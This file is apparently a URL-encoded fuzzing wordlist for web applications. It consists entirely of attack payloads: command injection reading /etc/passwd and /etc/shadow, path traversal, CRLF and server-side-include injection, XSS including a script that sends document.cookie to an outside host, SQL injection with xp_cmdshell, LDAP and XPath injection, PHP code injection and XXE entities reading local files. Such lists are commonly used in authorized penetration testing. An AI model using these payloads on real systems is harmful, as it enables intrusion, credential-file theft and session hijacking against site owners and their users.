A
TRUE
FALSE
0
00
1
-1
1.0
-1.0
2
-2
-20
65536
268435455
-268435455
2147483647
0xfffffff
NULL
null
%5C0
%5C00
%3C%20%20script%20%3E%20%3C%20%2F%20script%3E
%250a
%2500
%2B%2500
%5C0
%5C0%5C0
%5C0%5C0%5C0
%5C00
%5C00%5C00
%5C00%5C00%5C00
%24null
%24NULL
%60id%60
%60dir%60
%3Bid%3B
%3Bread%3B
%3Bnetstat%20-a%3B
%5Cnnetstat%20-a%25%5Cn
%5C%22blah
%7Cid%7C
%26quot%3B%3Bid%26quot%3B
id%2500
id%2500%7C
%7Cid
%7Cdir
%7Cdir%7C
%7Cls
%7Cls%20-la
%3Bls%20-la
%3Bdir
%7C%2Fbin%2Fls%20-al
%5Cn%2Fbin%2Fls%20-al%5Cn
%3Fx%3D
%3Fx%3D%22
%3Fx%3D%7C
%3Fx%3D%3E
%2Findex.html%7Cid%7C
%2Fboot.ini
%2Fetc%2Fpasswd
%2Fetc%2Fshadow
ABCD%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C%258.8x%7C
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts%2500
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts
..%2F..%2Fboot.ini
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%252A
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%2500
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%5E%5E
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%5E%5E
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fpasswd
%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fetc%2Fshadow
%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cshadow
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cshadow
%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2Fetc%2Fpasswd
%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2Fetc%2Fshadow
.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2Fetc%2Fpasswd
.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2Fetc%2Fshadow
%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd%2500
%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cshadow%2500
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd%2500
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cshadow%2500
%250a%2Fbin%2Fcat%2520%2Fetc%2Fpasswd
%250a%2Fbin%2Fcat%2520%2Fetc%2Fshadow
%2500%2Fetc%2Fpasswd%2500
%2500%2Fetc%2Fshadow%2500
%2500..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
%2500..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500.jpg
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500.html
%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2Fetc%2Fpasswd
%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2Fetc%2Fshadow
%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fshadow
%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2500
%2F%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2500
%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%25%0925%255c..%2525%255c..%2500
%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%25%09%0925%255c..%2525%255c..%25255cboot.ini
%2F%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..%2525%255c..winnt%2Fdesktop.ini
%5C%5C%26apos%3B%2Fbin%2Fcat%2520%2Fetc%2Fpasswd%5C%5C%26apos%3B
%5C%5C%26apos%3B%2Fbin%2Fcat%2520%2Fetc%2Fshadow%5C%5C%26apos%3B
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fconf%2Fserver.xml
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fid%7C
C%3A%2Finetpub%2Fwwwroot%2Fglobal.asa
C%3A%5Cinetpub%5Cwwwroot%5Cglobal.asa
C%3A%2Fboot.ini
C%3A%5Cboot.ini
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Flocalstart.asp%2500
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Flocalstart.asp
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%2500
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2F.%2Fboot.ini
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%2500
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2Fboot.ini
%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2F.%5C%5C.%2Fboot.ini
%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini%2500
..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%2500.html
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%2500.jpg
%2F...%2F...%2F...%2F...%2F...%2F
..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2F..%25c0%25af..%2Fboot.ini
%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fboot.ini
%250d%250aX-Injection-Header%3A%2520AttackValue
%21%40%230%25%5E%230%23%23018387%40%230%5E%5E%2A%2A%28%28%29
%2501%2502%2503%2504%250a%250d%250aADSF
%2F%2C%25ENV%2C%2F
%26lt%3B%21--%23exec%2520cmd%3D%26quot%3B%2Fbin%2Fcat%2520%2Fetc%2Fpasswd%26quot%3B--%26gt%3B
%26lt%3B%21--%23exec%2520cmd%3D%26quot%3B%2Fbin%2Fcat%2520%2Fetc%2Fshadow%26quot%3B--%26gt%3B
%25
%23
%2A
%7D
%3B
%2F
%5C
%5C%5C
%5C%5C%2F
%5C%5C%5C%5C%2A
%5C%5C%5C%5C%3F%5C%5C
%26lt
%26lt%3B
%26LT
%26LT%3B
%3C
%3C%3C
%3C%3C%3C
%7C
%7C%7C
%60
-
--
%2A%7C
%5E%27
%5C%27
%2F%27
%40%27
%28%27%29
%7B%27%7D
%5B%27%5D
%2A%27
%23%27
%21%27
%21%40%23%24%25%25%5E%23%24%25%23%24%40%23%24%25%24%24%40%23%24%25%5E%5E%2A%2A%28%28%29
%2501%2502%2503%2504%250a%250d%250aADSF
%5Ct
%22%5Ct%22
%26%2310%3B
%26%2313%3B
%26%2310%3B%26%2313%3B
%26%2313%3B%26%2310%3B
%23xD
%23xA
%23xD%23xA
%23xA%23xD
%2F%2500%2F
%2500%2F
%2500
%3C%3F
%253C
%253C%253F
%2560
%255C
%255C%2F
%257C
%2500
%2F%252A
%252A
%252C
%2520
%2520%7C
%25250a
%252500
..%2F
%252e%252e%252f
..%25u2215
..%25c0%25af
..%25bg%25qf
..%5C
..%255c
..%25%2535c
..%25255c
..%25%2535%2563
..%2525%2535%2563
..%25u2216
%26%2360
%26%23060
%26%230060
%26%2300060
%26%23000060
%26%230000060
%26%2360%3B
%26%23060%3B
%26%230060%3B
%26%2300060%3B
%26%23000060%3B
%26%230000060%3B
%26%23x3c
%26%23x03c
%26%23x003c
%26%23x0003c
%26%23x00003c
%26%23x000003c
%26%23x3c%3B
%26%23x03c%3B
%26%23x003c%3B
%26%23x0003c%3B
%26%23x00003c%3B
%26%23x000003c%3B
%26%23X3c
%26%23X03c
%26%23X003c
%26%23X0003c
%26%23X00003c
%26%23X000003c
%26%23X3c%3B
%26%23X03c%3B
%26%23X003c%3B
%26%23X0003c%3B
%26%23X00003c%3B
%26%23X000003c%3B
%26%23x3C
%26%23x03C
%26%23x003C
%26%23x0003C
%26%23x00003C
%26%23x000003C
%26%23x3C%3B
%26%23x03C%3B
%26%23x003C%3B
%26%23x0003C%3B
%26%23x00003C%3B
%26%23x000003C%3B
%26%23X3C
%26%23X03C
%26%23X003C
%26%23X0003C
%26%23X00003C
%26%23X000003C
%26%23X3C%3B
%26%23X03C%3B
%26%23X003C%3B
%26%23X0003C%3B
%26%23X00003C%3B
%26%23X000003C%3B
%5Cx3c
%5Cx3C
%5Cu003c
%5Cu003C
something%2500html
%26apos%3B
%2F%26apos%3B
%5C%26apos%3B
%5E%26apos%3B
%40%26apos%3B
%7B%26apos%3B%7D
%5B%26apos%3B%5D
%2A%26apos%3B
%23%26apos%3B
%22%3Exxx%3CP%3Eyyy
%22%3E%3Cscript%3E%22
%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
%3C%3Cscript%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2Fscript%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F
%253cscript%253ealert%28%22XSS%22%29%3B%253c%2Fscript%253e
%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e
%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C%2Fscript%253E
%26ltscript%26gtalert%28document.cookie%29%3B%3C%2Fscript%3E
%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert
%3Cxss%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%2Fvulnerable%3E
%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E
%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22
%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E
%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E
%3CIMG%20SRC%3Djavascript%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E
%3CIMG%20SRC%3D%60javascript%3Aalert%28%22%27XSS%27%22%29%60%3E
%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E
%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E
%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E
%3CIMG%20SRC%3D%22jav%09ascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aalert%28%27XSS%27%29%3B%22%3E
%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E
%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E
%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E
%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C%2FIFRAME%253E
%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fyour.site.com%2Fcgi-bin%2Fcookie.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E
%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E
%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D
%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D

%27
%22
%23
-
--
%27%20--
--%27%3B
%27%20%3B
%3D%20%27
%3D%20%3B
%3D%20--
%5Cx23
%5Cx27
%5Cx3D%20%5Cx3B%27
%5Cx3D%20%5Cx27
%5Cx27%5Cx4F%5Cx52%20SELECT%20%2A
%5Cx27%5Cx6F%5Cx72%20SELECT%20%2A
%27or%20select%20%2A
admin%27--
%3C%3E%22%27%25%3B%29%28%26%2B
%27%20or%20%27%27%3D%27
%27%20or%20%27x%27%3D%27x
%22%20or%20%22x%22%3D%22x
%27%29%20or%20%28%27x%27%3D%27x
0%20or%201%3D1
%27%20or%200%3D0%20--
%22%20or%200%3D0%20--
or%200%3D0%20--
%27%20or%200%3D0%20%23
%22%20or%200%3D0%20%23
or%200%3D0%20%23
%27%20or%201%3D1--
%22%20or%201%3D1--
%27%20or%20%271%27%3D%271%27--
%22%27%20or%201%20--%27%22
or%201%3D1--
or%25201%3D1
or%25201%3D1%20--
%27%20or%201%3D1%20or%20%27%27%3D%27
%22%20or%201%3D1%20or%20%22%22%3D%22
%27%20or%20a%3Da--
%22%20or%20%22a%22%3D%22a
%27%29%20or%20%28%27a%27%3D%27a
%22%29%20or%20%28%22a%22%3D%22a
hi%22%20or%20%22a%22%3D%22a
hi%22%20or%201%3D1%20--
hi%27%20or%201%3D1%20--
hi%27%20or%20%27a%27%3D%27a
hi%27%29%20or%20%28%27a%27%3D%27a
hi%22%29%20or%20%28%22a%22%3D%22a
%27hi%27%20or%20%27x%27%3D%27x%27%3B
%40variable
%2C%40variable
PRINT
PRINT%20%40%40variable
select
insert
as
or
procedure
limit
order%20by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
%27%20or%20username%20like%20%27%25
%27%20or%20uname%20like%20%27%25
%27%20or%20userid%20like%20%27%25
%27%20or%20uid%20like%20%27%25
%27%20or%20user%20like%20%27%25
exec%20xp
exec%20sp
%27%3B%20exec%20master..xp_cmdshell
%27%3B%20exec%20xp_regread
t%27exec%20master..xp_cmdshell%20%27nslookup%20www.google.com%27--
--sp_password
%5Cx27UNION%20SELECT
%27%20UNION%20SELECT
%27%20UNION%20ALL%20SELECT
%27%20or%20%28EXISTS%29
%27%20%28select%20top%201
%27%7C%7CUTL_HTTP.REQUEST
1%3BSELECT%2520%2A
to_timestamp_tz
tz_offset
%26lt%3B%26gt%3B%26quot%3B%27%25%3B%29%28%26amp%3B%2B
%27%2520or%25201%3D1
%2527%2520or%25201%3D1
%2520%24%28sleep%252050%29
%2520%27sleep%252050%27
char%254039%2541%252b%2540SELECT
%26apos%3B%2520OR
%27sqlattempt1
%28sqlattempt2%29
%7C
%257C
%2A%7C
%252A%257C
%2A%28%7C%28mail%3D%2A%29%29
%252A%2528%257C%2528mail%253D%252A%2529%2529
%2A%28%7C%28objectclass%3D%2A%29%29
%252A%2528%257C%2528objectclass%253D%252A%2529%2529
%28
%2528
%29
%2529
%26
%2526
%21
%2521
%27%20or%201%3D1%20or%20%27%27%3D%27
%27%20or%20%27%27%3D%27
x%27%20or%201%3D1%20or%20%27x%27%3D%27y
%2F
%2F%2F
%2F%2F%2A
%2A%2F%2A
%40%2A
count%28%2Fchild%3A%3Anode%28%29%29
x%27%20or%20name%28%29%3D%27username%27%20or%20%27x%27%3D%27y
%3Cname%3E%27%2C%27%27%29%29%3B%20phpinfo%28%29%3B%20exit%3B%2F%2A%3C%2Fname%3E
%3C%21%5BCDATA%5B%3Cscript%3Evar%20n%3D0%3Bwhile%28true%29%7Bn%2B%2B%3B%7D%3C%2Fscript%3E%5D%5D%3E
%3C%21%5BCDATA%5B%3C%5D%5D%3ESCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3Ealert%28%27XSS%27%29%3B%3C%21%5BCDATA%5B%3C%5D%5D%3E%2FSCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3Cfoo%3E%3C%21%5BCDATA%5B%3C%5D%5D%3ESCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3Ealert%28%27XSS%27%29%3B%3C%21%5BCDATA%5B%3C%5D%5D%3E%2FSCRIPT%3C%21%5BCDATA%5B%3E%5D%5D%3E%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3Cfoo%3E%3C%21%5BCDATA%5B%27%20or%201%3D1%20or%20%27%27%3D%27%5D%5D%3E%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2F%2Fetc%2Fshadow%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2F%2Fdev%2Frandom%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
%3Cxml%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3E%3C%21%5BCDATA%5Bcript%3Aalert%28%27XSS%27%29%3B%22%3E%5D%5D%3E
%3Cxml%20ID%3D%22xss%22%3E%3CI%3E%3CB%3E%26lt%3BIMG%20SRC%3D%22javas%3C%21--%20--%3Ecript%3Aalert%28%27XSS%27%29%22%26gt%3B%3C%2FB%3E%3C%2FI%3E%3C%2Fxml%3E%3CSPAN%20DATASRC%3D%22%23xss%22%20DATAFLD%3D%22B%22%20DATAFORMATAS%3D%22HTML%22%3E%3C%2FSPAN%3E%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
%3Cxml%20SRC%3D%22xsstest.xml%22%20ID%3DI%3E%3C%2Fxml%3E%3CSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
%3CHTML%20xmlns%3Axss%3E%3C%3Fimport%20namespace%3D%22xss%22%20implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E%3C%2FHTML%3E
